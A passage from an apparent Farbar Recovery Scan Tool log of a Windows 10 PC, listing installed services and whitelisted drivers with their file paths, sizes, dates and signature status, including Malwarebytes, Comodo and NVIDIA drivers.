U3 PolicyAgent; C:\WINDOWS\System32\ipsecsvc.dll [391168 2016-07-16] (Microsoft Corporation) [File not signed]
U2 Power; C:\WINDOWS\system32\umpo.dll [123904 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PrintNotify; C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll [3318784 2017-03-04] (Microsoft Corporation) [File not signed]
U2 ProfSvc; C:\WINDOWS\system32\profsvc.dll [358400 2016-09-15] (Microsoft Corporation) [File not signed]
U3 QWAVE; C:\WINDOWS\system32\qwave.dll [275456 2016-07-16] (Microsoft Corporation) [File not signed]
U3 QWAVE; C:\WINDOWS\SysWOW64\qwave.dll [234496 2016-07-16] (Microsoft Corporation) [File not signed]
S3 RasAuto; C:\WINDOWS\System32\rasauto.dll [105472 2016-07-16] (Microsoft Corporation) [File not signed]
S3 RasMan; C:\WINDOWS\System32\rasmans.dll [658432 2017-03-04] (Microsoft Corporation) [File not signed]
S4 RemoteAccess; C:\WINDOWS\System32\mprdim.dll [496128 2016-09-15] (Microsoft Corporation) [File not signed]
S4 RemoteAccess; C:\WINDOWS\SysWOW64\mprdim.dll [431104 2016-09-15] (Microsoft Corporation) [File not signed]
U4 RemoteRegistry; C:\WINDOWS\system32\regsvc.dll [155648 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RetailDemo; C:\WINDOWS\system32\RDXService.dll [650752 2017-03-04] (Microsoft Corporation) [File not signed]
U3 RmSvc; C:\WINDOWS\System32\RMapi.dll [140800 2016-09-15] (Microsoft Corporation) [File not signed]
R2 RpcEptMapper; C:\WINDOWS\System32\RpcEpMap.dll [79360 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RpcLocator; C:\WINDOWS\system32\locator.exe [11264 2016-07-16] (Microsoft Corporation) [File not signed]
R2 RpcSs; C:\WINDOWS\system32\rpcss.dll [888320 2016-07-16] (Microsoft Corporation) [File not signed]
U4 SCardSvr; C:\WINDOWS\System32\SCardSvr.dll [250880 2016-07-16] (Microsoft Corporation) [File not signed]
U3 ScDeviceEnum; C:\WINDOWS\System32\ScDeviceEnum.dll [201728 2016-12-14] (Microsoft Corporation) [File not signed]
U2 Schedule; C:\WINDOWS\system32\schedsvc.dll [948224 2016-07-16] (Microsoft Corporation) [File not signed]
U3 SCPolicySvc; C:\WINDOWS\System32\certprop.dll [193536 2017-03-04] (Microsoft Corporation) [File not signed]
U3 SDRSVC; C:\WINDOWS\System32\SDRSVC.dll [147968 2016-07-16] (Microsoft Corporation) [File not signed]
U3 seclogon; C:\WINDOWS\system32\seclogon.dll [31232 2016-07-16] (Microsoft Corporation) [File not signed]
R2 SENS; C:\WINDOWS\System32\sens.dll [70656 2016-09-15] (Microsoft Corporation) [File not signed]
U3 SensorDataService; C:\WINDOWS\System32\SensorDataService.exe [1312768 2017-03-04] (Microsoft Corporation) [File not signed]
U3 SensorService; C:\WINDOWS\system32\SensorService.dll [417792 2016-09-15] (Microsoft Corporation) [File not signed]
U3 SensrSvc; C:\WINDOWS\system32\sensrsvc.dll [179200 2016-07-16] (Microsoft Corporation) [File not signed]
U3 SessionEnv; C:\WINDOWS\system32\sessenv.dll [387072 2016-09-15] (Microsoft Corporation) [File not signed]
U3 SessionEnv; C:\WINDOWS\SysWOW64\sessenv.dll [331776 2016-09-15] (Microsoft Corporation) [File not signed]
U3 SharedAccess; C:\WINDOWS\System32\ipnathlp.dll [541696 2017-03-04] (Microsoft Corporation) [File not signed]
U2 ShellHWDetection; C:\WINDOWS\System32\shsvcs.dll [617472 2016-07-16] (Microsoft Corporation) [File not signed]
U2 ShellHWDetection; C:\WINDOWS\SysWOW64\shsvcs.dll [566784 2016-07-16] (Microsoft Corporation) [File not signed]
U4 shpamsvc; C:\WINDOWS\system32\Windows.SharedPC.AccountManager.dll [161792 2016-07-16] (Microsoft Corporation) [File not signed]
U3 smphost; C:\WINDOWS\System32\smphost.dll [23552 2016-08-06] (Microsoft Corporation) [File not signed]
U3 smphost; C:\WINDOWS\SysWOW64\smphost.dll [20992 2016-08-06] (Microsoft Corporation) [File not signed]
U3 SmsRouter; C:\WINDOWS\system32\SmsRouterSvc.dll [590848 2016-07-16] (Microsoft Corporation) [File not signed]
U3 SNMPTRAP; C:\WINDOWS\System32\snmptrap.exe [15872 2016-07-16] (Microsoft Corporation) [File not signed]
R2 Spooler; C:\WINDOWS\System32\spoolsv.exe [792576 2017-03-04] (Microsoft Corporation) [File not signed]
U3 SSDPSRV; C:\WINDOWS\System32\ssdpsrv.dll [236544 2016-07-16] (Microsoft Corporation) [File not signed]
U3 SstpSvc; C:\WINDOWS\system32\sstpsvc.dll [209920 2016-07-16] (Microsoft Corporation) [File not signed]
U3 StateRepository; C:\WINDOWS\system32\windows.staterepository.dll [4136448 2016-11-11] (Microsoft Corporation) [File not signed]
U3 StateRepository; C:\WINDOWS\SysWOW64\windows.staterepository.dll [3370496 2016-11-11] (Microsoft Corporation) [File not signed]
U2 stisvc; C:\WINDOWS\System32\wiaservc.dll [646656 2016-07-16] (Microsoft Corporation) [File not signed]
U3 StorSvc; C:\WINDOWS\system32\storsvc.dll [396800 2016-11-11] (Microsoft Corporation) [File not signed]
U3 svsvc; C:\WINDOWS\system32\svsvc.dll [13824 2016-07-16] (Microsoft Corporation) [File not signed]
U3 swprv; C:\WINDOWS\System32\swprv.dll [467456 2016-07-16] (Microsoft Corporation) [File not signed]
U4 SysMain; C:\WINDOWS\system32\sysmain.dll [944128 2016-07-16] (Microsoft Corporation) [File not signed]
U2 SystemEventsBroker; C:\WINDOWS\System32\SystemEventsBrokerServer.dll [387072 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TabletInputService; C:\WINDOWS\System32\TabSvc.dll [148992 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TapiSrv; C:\WINDOWS\System32\tapisrv.dll [309248 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TapiSrv; C:\WINDOWS\SysWOW64\tapisrv.dll [254976 2016-07-16] (Microsoft Corporation) [File not signed]
S3 TermService; C:\WINDOWS\System32\termsrv.dll [987648 2016-07-16] (Microsoft Corporation) [File not signed]
R2 Themes; C:\WINDOWS\system32\themeservice.dll [70656 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TieringEngineService; C:\WINDOWS\system32\TieringEngineService.exe [287744 2016-07-16] (Microsoft Corporation) [File not signed]
U2 tiledatamodelsvc; C:\WINDOWS\system32\tileobjserver.dll [574976 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TimeBrokerSvc; C:\WINDOWS\System32\TimeBrokerServer.dll [177664 2016-07-16] (Microsoft Corporation) [File not signed]
U2 TrkWks; C:\WINDOWS\System32\trkwks.dll [116736 2016-07-16] (Microsoft Corporation) [File not signed]
S3 TrustedInstaller; C:\WINDOWS\servicing\TrustedInstaller.exe [122880 2016-11-11] (Microsoft Corporation) [File not signed]
U4 TunngleService; C:\Program Files (x86)\Tunngle\TnglCtrl.exe [809424 2015-10-27] (Tunngle.net GmbH) [File not signed]
U4 tzautoupdate; C:\WINDOWS\system32\tzautoupdate.dll [95232 2017-03-04] (Microsoft Corporation) [File not signed]
U3 UI0Detect; C:\WINDOWS\system32\UI0Detect.exe [42496 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UmRdpService; C:\WINDOWS\System32\umrdp.dll [273408 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UnistoreSvc; C:\WINDOWS\System32\unistore.dll [1184256 2017-03-04] (Microsoft Corporation) [File not signed]
U3 UnistoreSvc; C:\WINDOWS\SysWOW64\unistore.dll [968704 2017-03-04] (Microsoft Corporation) [File not signed]
U3 upnphost; C:\WINDOWS\System32\upnphost.dll [440832 2016-07-16] (Microsoft Corporation) [File not signed]
U3 upnphost; C:\WINDOWS\SysWOW64\upnphost.dll [328192 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UserDataSvc; C:\WINDOWS\System32\userdataservice.dll [1512448 2017-03-04] (Microsoft Corporation) [File not signed]
U2 UserManager; C:\WINDOWS\System32\usermgr.dll [1020928 2016-09-15] (Microsoft Corporation) [File not signed]
U3 UsoSvc; C:\WINDOWS\system32\usocore.dll [548864 2017-03-04] (Microsoft Corporation) [File not signed]
U3 VaultSvc; C:\Windows\System32\vaultsvc.dll [358912 2016-07-16] (Microsoft Corporation) [File not signed]
U3 vds; C:\WINDOWS\System32\vds.exe [649216 2017-03-04] (Microsoft Corporation) [File not signed]
U3 vmicguestinterface; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
U3 vmicheartbeat; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
U3 vmickvpexchange; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
U3 vmicrdv; C:\WINDOWS\System32\icsvcext.dll [349696 2017-03-04] (Microsoft Corporation) [File not signed]
U3 vmicshutdown; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
U3 vmictimesync; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
U3 vmicvmsession; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
U3 vmicvss; C:\WINDOWS\System32\icsvcext.dll [349696 2017-03-04] (Microsoft Corporation) [File not signed]
U3 VSS; C:\WINDOWS\system32\vssvc.exe [1443328 2017-03-04] (Microsoft Corporation) [File not signed]
U3 W32Time; C:\WINDOWS\system32\w32time.dll [520192 2016-09-27] (Microsoft Corporation) [File not signed]
U3 WalletService; C:\WINDOWS\system32\WalletService.dll [436224 2016-07-16] (Microsoft Corporation) [File not signed]
U3 wbengine; C:\WINDOWS\system32\wbengine.exe [1547264 2017-03-04] (Microsoft Corporation) [File not signed]
U2 WbioSrvc; C:\WINDOWS\System32\wbiosrvc.dll [837632 2016-12-14] (Microsoft Corporation) [File not signed]
U2 Wcmsvc; C:\WINDOWS\System32\wcmsvc.dll [715776 2017-03-04] (Microsoft Corporation) [File not signed]
U3 wcncsvc; C:\WINDOWS\System32\wcncsvc.dll [468992 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WdiServiceHost; C:\WINDOWS\system32\wdi.dll [97792 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WdiServiceHost; C:\WINDOWS\SysWOW64\wdi.dll [89088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WdiSystemHost; C:\WINDOWS\system32\wdi.dll [97792 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WdiSystemHost; C:\WINDOWS\SysWOW64\wdi.dll [89088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
U3 WebClient; C:\WINDOWS\System32\webclnt.dll [227328 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WebClient; C:\WINDOWS\SysWOW64\webclnt.dll [198656 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Wecsvc; C:\WINDOWS\system32\wecsvc.dll [206848 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WEPHOSTSVC; C:\WINDOWS\system32\wephostsvc.dll [27648 2016-07-16] (Microsoft Corporation) [File not signed]
U3 wercplsupport; C:\WINDOWS\System32\wercplsupport.dll [94208 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WerSvc; C:\WINDOWS\System32\WerSvc.dll [156672 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WiaRpc; C:\WINDOWS\System32\wiarpc.dll [82944 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103712 2017-03-04] (Microsoft Corporation)
U3 WinHttpAutoProxySvc; C:\WINDOWS\system32\winhttp.dll [818176 2017-03-04] (Microsoft Corporation) [File not signed]
U3 WinHttpAutoProxySvc; C:\WINDOWS\SysWOW64\winhttp.dll [636928 2017-03-04] (Microsoft Corporation) [File not signed]
U2 Winmgmt; C:\WINDOWS\system32\wbem\WMIsvc.dll [222720 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WinRM; C:\WINDOWS\system32\WsmSvc.dll [2716672 2016-11-11] (Microsoft Corporation) [File not signed]
U3 WinRM; C:\WINDOWS\SysWOW64\WsmSvc.dll [2333184 2016-11-11] (Microsoft Corporation) [File not signed]
U3 wisvc; C:\WINDOWS\system32\flightsettings.dll [635904 2017-03-04] (Microsoft Corporation) [File not signed]
U4 WkSvw32.exe; C:\Program Files (x86)\WIBUKEY\Server\WkSvw32.exe [659336 2013-12-18] (WIBU-SYSTEMS AG)
U3 WlanSvc; C:\WINDOWS\System32\wlansvc.dll [2370048 2017-03-04] (Microsoft Corporation) [File not signed]
U3 wlidsvc; C:\WINDOWS\system32\wlidsvc.dll [2104320 2016-11-11] (Microsoft Corporation) [File not signed]
U3 wmiApSrv; C:\WINDOWS\system32\wbem\WmiApSrv.exe [203264 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WMPNetworkSvc; C:\Program Files\Windows Media Player\wmpnetwk.exe [1184256 2016-09-27] (Microsoft Corporation) [File not signed]
U3 workfolderssvc; C:\WINDOWS\system32\workfolderssvc.dll [1837056 2017-03-04] (Microsoft Corporation) [File not signed]
U3 WPDBusEnum; C:\WINDOWS\system32\wpdbusenum.dll [88064 2016-07-16] (Microsoft Corporation) [File not signed]
U2 WpnService; C:\WINDOWS\system32\WpnService.dll [234496 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WpnUserService; C:\WINDOWS\System32\WpnUserService.dll [74240 2016-07-16] (Microsoft Corporation) [File not signed]
U2 wscsvc; C:\WINDOWS\System32\wscsvc.dll [184832 2016-11-11] (Microsoft Corporation) [File not signed]
U4 WSearch; C:\WINDOWS\system32\SearchIndexer.exe [903680 2017-03-04] (Microsoft Corporation) [File not signed]
U4 WSearch; C:\WINDOWS\SysWOW64\SearchIndexer.exe [773120 2017-03-04] (Microsoft Corporation) [File not signed]
U3 wuauserv; C:\WINDOWS\system32\wuaueng.dll [2317824 2017-03-04] (Microsoft Corporation) [File not signed]
U3 wudfsvc; C:\WINDOWS\System32\WUDFSvc.dll [99840 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WwanSvc; C:\WINDOWS\System32\wwansvc.dll [1282048 2017-03-04] (Microsoft Corporation) [File not signed]
U3 XblAuthManager; C:\WINDOWS\System32\XblAuthManager.dll [1016320 2017-03-04] (Microsoft Corporation) [File not signed]
U3 XblGameSave; C:\WINDOWS\System32\XblGameSave.dll [1159680 2016-07-16] (Microsoft Corporation) [File not signed]
U3 XboxNetApiSvc; C:\WINDOWS\system32\XboxNetApiSvc.dll [1025536 2017-03-04] (Microsoft Corporation) [File not signed]
U2 ZAMSvc; C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe [14471408 2017-03-06] (Copyright 2017.)
U2 NVIDIA Wireless Controller Service; "C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe" [X]
U3 OverwolfUpdater; "C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe" /RunningFrom SCM" [X]
===================== Drivers (Whitelisted) ======================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
U3 1394ohci; C:\WINDOWS\System32\drivers\1394ohci.sys [235520 2016-07-16] (Microsoft Corporation) [File not signed]
U3 AcpiDev; C:\WINDOWS\System32\drivers\AcpiDev.sys [18432 2016-07-16] (Microsoft Corporation) [File not signed]
U3 acpipagr; C:\WINDOWS\System32\drivers\acpipagr.sys [12288 2016-07-16] (Microsoft Corporation) [File not signed]
U3 AcpiPmi; C:\WINDOWS\System32\drivers\acpipmi.sys [14336 2016-07-16] (Microsoft Corporation) [File not signed]
U3 acpitime; C:\WINDOWS\System32\drivers\acpitime.sys [13312 2016-07-16] (Microsoft Corporation) [File not signed]
U1 ahcache; C:\WINDOWS\System32\DRIVERS\ahcache.sys [227328 2016-10-15] (Microsoft Corporation) [File not signed]
U3 AmdK8; C:\WINDOWS\System32\drivers\amdk8.sys [123392 2016-07-16] (Microsoft Corporation) [File not signed]
U3 AmdPPM; C:\WINDOWS\System32\drivers\amdppm.sys [120832 2016-07-16] (Microsoft Corporation) [File not signed]
U3 applockerfltr; C:\WINDOWS\System32\drivers\applockerfltr.sys [15360 2016-07-16] (Microsoft Corporation) [File not signed]
U3 AsyncMac; C:\WINDOWS\System32\drivers\asyncmac.sys [28160 2016-07-16] (Microsoft Corporation) [File not signed]
U1 BasicDisplay; C:\WINDOWS\System32\drivers\BasicDisplay.sys [56320 2016-07-16] (Microsoft Corporation) [File not signed]
U1 BasicRender; C:\WINDOWS\System32\drivers\BasicRender.sys [41472 2016-07-16] (Microsoft Corporation) [File not signed]
U3 bcmfn; C:\WINDOWS\System32\drivers\bcmfn.sys [9728 2016-07-16] (Windows (R) Win 7 DDK provider) [File not signed]
U3 bcmfn2; C:\WINDOWS\System32\drivers\bcmfn2.sys [9728 2016-07-16] (Windows (R) Win 7 DDK provider) [File not signed]
U1 Beep; C:\Windows\System32\Drivers\Beep.sys [9728 2016-07-16] (Microsoft Corporation) [File not signed]
U3 bowser; C:\WINDOWS\System32\DRIVERS\bowser.sys [101888 2016-11-02] (Microsoft Corporation) [File not signed]
U3 BthAvrcpTg; C:\WINDOWS\System32\drivers\BthAvrcpTg.sys [43008 2016-07-16] (Microsoft Corporation) [File not signed]
U3 BthHFEnum; C:\WINDOWS\System32\drivers\bthhfenum.sys [65536 2016-07-16] (Microsoft Corporation) [File not signed]
U3 bthhfhid; C:\WINDOWS\System32\drivers\BthHFHid.sys [31232 2016-07-16] (Microsoft Corporation) [File not signed]
U3 BTHMODEM; C:\WINDOWS\System32\drivers\bthmodem.sys [66048 2016-07-16] (Microsoft Corporation) [File not signed]
U3 buttonconverter; C:\WINDOWS\System32\drivers\buttonconverter.sys [38912 2016-07-16] (Microsoft Corporation) [File not signed]
U3 CapImg; C:\WINDOWS\System32\drivers\capimg.sys [118272 2016-09-10] (Microsoft Corporation) [File not signed]
U4 cdfs; C:\WINDOWS\System32\DRIVERS\cdfs.sys [92160 2016-07-16] (Microsoft Corporation) [File not signed]
U1 cdrom; C:\WINDOWS\System32\drivers\cdrom.sys [173056 2016-07-16] (Microsoft Corporation) [File not signed]
U3 circlass; C:\WINDOWS\System32\drivers\circlass.sys [48640 2016-07-16] (Microsoft Corporation) [File not signed]
U2 clreg; C:\WINDOWS\System32\drivers\registry.sys [70144 2016-07-16] (Microsoft Corporation) [File not signed]
U3 CmBatt; C:\WINDOWS\System32\drivers\CmBatt.sys [29696 2016-07-16] (Microsoft Corporation) [File not signed]
U1 cmderd; C:\WINDOWS\System32\DRIVERS\cmderd.sys [40952 2016-12-16] (COMODO)
U1 cmdGuard; C:\WINDOWS\System32\DRIVERS\cmdguard.sys [828360 2016-12-16] (COMODO)
U1 cmdhlp; C:\WINDOWS\system32\DRIVERS\cmdhlp.sys [50288 2016-12-16] (COMODO)
U3 CompositeBus; C:\WINDOWS\System32\DriverStore\FileRepository\compositebus.inf_amd64_a140581a8f8b58b7\CompositeBus.sys [39936 2016-07-16] (Microsoft Corporation) [File not signed]
U1 Dfsc; C:\WINDOWS\System32\Drivers\dfsc.sys [145408 2017-03-04] (Microsoft Corporation) [File not signed]
U3 dmvsc; C:\WINDOWS\System32\drivers\dmvsc.sys [35840 2016-07-16] (Microsoft Corporation) [File not signed]
U3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [30264 2015-08-26] (Disc Soft Ltd)
U1 ElRawDisk; C:\Windows\system32\drivers\ElRawDsk.sys [30752 2013-12-03] (EldoS Corporation)
U3 ErrDev; C:\WINDOWS\System32\drivers\errdev.sys [13312 2016-07-16] (Microsoft Corporation) [File not signed]
U1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77408 2017-02-24] ()
U3 exfat; C:\Windows\System32\Drivers\exfat.sys [334848 2016-07-16] (Microsoft Corporation) [File not signed]
U3 fdc; C:\WINDOWS\System32\drivers\fdc.sys [32256 2016-07-16] (Microsoft Corporation) [File not signed]
U1 FileCrypt; C:\WINDOWS\System32\drivers\filecrypt.sys [88576 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Filetrace; C:\WINDOWS\System32\drivers\filetrace.sys [35840 2016-07-16] (Microsoft Corporation) [File not signed]
U3 flpydisk; C:\WINDOWS\System32\drivers\flpydisk.sys [26112 2016-07-16] (Microsoft Corporation) [File not signed]
U3 gencounter; C:\WINDOWS\System32\drivers\vmgencounter.sys [13312 2016-07-16] (Microsoft Corporation) [File not signed]
U3 genericusbfn; C:\WINDOWS\System32\drivers\genericusbfn.sys [20480 2016-07-16] (Microsoft Corporation) [File not signed]
U1 GpuEnergyDrv; C:\WINDOWS\System32\drivers\gpuenergydrv.sys [8192 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HDAudBus; C:\WINDOWS\System32\drivers\HDAudBus.sys [83456 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HidBth; C:\WINDOWS\System32\drivers\hidbth.sys [108032 2016-07-16] (Microsoft Corporation) [File not signed]
U3 hidi2c; C:\WINDOWS\System32\drivers\hidi2c.sys [51200 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HidIr; C:\WINDOWS\System32\drivers\hidir.sys [46592 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HidUsb; C:\WINDOWS\System32\drivers\hidusb.sys [38400 2016-09-27] (Microsoft Corporation) [File not signed]
U3 hyperkbd; C:\WINDOWS\System32\drivers\hyperkbd.sys [16384 2016-07-16] (Microsoft Corporation) [File not signed]
U3 i8042prt; C:\WINDOWS\System32\drivers\i8042prt.sys [114176 2016-07-16] (Microsoft Corporation) [File not signed]
U3 iagpio; C:\WINDOWS\System32\drivers\iagpio.sys [33280 2016-07-16] (Intel(R) Corporation) [File not signed]
U3 iai2c; C:\WINDOWS\System32\drivers\iai2c.sys [81408 2016-07-16] (Intel(R) Corporation) [File not signed]
U3 iaLPSS2i_GPIO2; C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys [64512 2016-07-16] (Intel Corporation) [File not signed]
U3 iaLPSS2_UART2; C:\WINDOWS\System32\drivers\iaLPSS2_UART2.sys [273168 2015-05-04] (Intel Corporation)
U3 iaLPSSi_I2C; C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [113152 2016-07-16] (Intel Corporation) [File not signed]
U3 IndirectKmd; C:\WINDOWS\System32\drivers\IndirectKmd.sys [35840 2016-07-16] (Microsoft Corporation) [File not signed]
U1 inspect; C:\WINDOWS\system32\DRIVERS\inspect.sys [127144 2016-12-16] (COMODO)
U3 intelppm; C:\WINDOWS\System32\drivers\intelppm.sys [134144 2016-07-16] (Microsoft Corporation) [File not signed]
U3 IpFilterDriver; C:\WINDOWS\System32\DRIVERS\ipfltdrv.sys [85504 2016-07-16] (Microsoft Corporation) [File not signed]
U3 IPNAT; C:\WINDOWS\System32\drivers\ipnat.sys [212480 2016-07-16] (Microsoft Corporation) [File not signed]
U3 irda; C:\WINDOWS\system32\drivers\irda.sys [120320 2016-07-16] (Microsoft Corporation) [File not signed]
U3 IRENUM; C:\WINDOWS\System32\drivers\irenum.sys [19456 2016-07-16] (Microsoft Corporation) [File not signed]
U3 kbdhid; C:\WINDOWS\System32\drivers\kbdhid.sys [39424 2016-09-15] (Microsoft Corporation) [File not signed]
U3 kdnic; C:\WINDOWS\System32\drivers\kdnic.sys [25088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 ksthunk; C:\WINDOWS\system32\drivers\ksthunk.sys [26112 2016-07-16] (Microsoft Corporation) [File not signed]
U2 lltdio; C:\WINDOWS\System32\drivers\lltdio.sys [66048 2016-07-16] (Microsoft Corporation) [File not signed]
U2 luafv; C:\WINDOWS\system32\drivers\luafv.sys [125952 2016-07-16] (Microsoft Corporation) [File not signed]
U2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [186304 2017-03-15] (Malwarebytes)
U3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [111544 2017-03-15] (Malwarebytes)
U3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-03-15] (Malwarebytes)
U3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [251840 2017-03-15] (Malwarebytes)
U3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [92088 2017-03-16] (Malwarebytes)
U2 MMCSS; C:\WINDOWS\system32\drivers\mmcss.sys [48128 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Modem; C:\WINDOWS\System32\drivers\modem.sys [42496 2016-11-11] (Microsoft Corporation) [File not signed]
U3 monitor; C:\WINDOWS\System32\drivers\monitor.sys [38400 2016-07-16] (Microsoft Corporation) [File not signed]
U3 mouhid; C:\WINDOWS\System32\drivers\mouhid.sys [32256 2016-07-16] (Microsoft Corporation) [File not signed]
U3 mpsdrv; C:\WINDOWS\System32\drivers\mpsdrv.sys [75776 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MRxDAV; C:\WINDOWS\system32\drivers\mrxdav.sys [143872 2016-10-05] (Microsoft Corporation) [File not signed]
U2 mrxsmb10; C:\WINDOWS\System32\DRIVERS\mrxsmb10.sys [282624 2016-11-11] (Microsoft Corporation) [File not signed]
U3 MsBridge; C:\WINDOWS\System32\drivers\bridge.sys [114688 2016-07-16] (Microsoft Corporation) [File not signed]
U3 mshidkmdf; C:\WINDOWS\System32\drivers\mshidkmdf.sys [8704 2016-07-16] (Microsoft Corporation) [File not signed]
U3 mshidumdf; C:\WINDOWS\System32\drivers\mshidumdf.sys [11776 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MSKSSRV; C:\WINDOWS\system32\DRIVERS\MSKSSRV.sys [27136 2017-03-04] (Microsoft Corporation) [File not signed]
U2 MsLldp; C:\WINDOWS\System32\drivers\mslldp.sys [78336 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MSPCLOCK; C:\WINDOWS\system32\DRIVERS\MSPCLOCK.sys [10752 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MSPQM; C:\WINDOWS\system32\DRIVERS\MSPQM.sys [10752 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MSTEE; C:\WINDOWS\system32\DRIVERS\MSTEE.sys [12800 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MTConfig; C:\WINDOWS\System32\drivers\MTConfig.sys [15872 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NativeWifiP; C:\WINDOWS\System32\DRIVERS\nwifi.sys [535552 2017-03-04] (Microsoft Corporation) [File not signed]
U3 NdisCap; C:\WINDOWS\System32\drivers\ndiscap.sys [50176 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NdisImPlatform; C:\WINDOWS\System32\drivers\NdisImPlatform.sys [126464 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NdisTapi; C:\WINDOWS\System32\DRIVERS\ndistapi.sys [26112 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Ndisuio; C:\WINDOWS\System32\drivers\ndisuio.sys [63488 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NdisVirtualBus; C:\WINDOWS\System32\drivers\NdisVirtualBus.sys [20480 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NdisWan; C:\WINDOWS\System32\drivers\ndiswan.sys [189440 2016-07-16] (Microsoft Corporation) [File not signed]
U3 ndiswanlegacy; C:\WINDOWS\System32\DRIVERS\ndiswan.sys [189440 2016-07-16] (Microsoft Corporation) [File not signed]
U3 ndproxy; C:\WINDOWS\System32\DRIVERS\NDProxy.sys [60928 2016-07-16] (Microsoft Corporation) [File not signed]
U2 Ndu; C:\WINDOWS\System32\drivers\Ndu.sys [125440 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] () [File not signed]
U1 NetBT; C:\WINDOWS\System32\DRIVERS\netbt.sys [279040 2016-07-16] (Microsoft Corporation) [File not signed]
U1 Npfs; C:\Windows\System32\Drivers\Npfs.sys [68608 2016-07-16] (Microsoft Corporation) [File not signed]
U1 npsvctrig; C:\WINDOWS\System32\drivers\npsvctrig.sys [26624 2016-07-16] (Microsoft Corporation) [File not signed]
U1 nsiproxy; C:\WINDOWS\System32\drivers\nsiproxy.sys [41984 2016-07-16] (Microsoft Corporation) [File not signed]
U1 Null; C:\Windows\System32\Drivers\Null.sys [7168 2016-07-16] (Microsoft Corporation) [File not signed]
U3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispiwu.inf_amd64_b67dc924fff8de6d\nvlddmkm.sys [14199224 2017-01-04] (NVIDIA Corporation)
U3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [27584 2017-02-23] (NVIDIA Corporation)
U3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [46016 2017-01-20] (NVIDIA Corporation)
U3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-02-23] (NVIDIA Corporation)
U3 Parport; C:\WINDOWS\System32\drivers\parport.sys [96768 2016-07-16] (Microsoft Corporation) [File not signed]
U2 PEAUTH; C:\WINDOWS\System32\drivers\peauth.sys [723968 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PptpMiniport; C:\WINDOWS\System32\drivers\raspptp.sys [96256 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Processor; C:\WINDOWS\System32\drivers\processr.sys [119808 2016-07-16] (Microsoft Corporation) [File not signed]
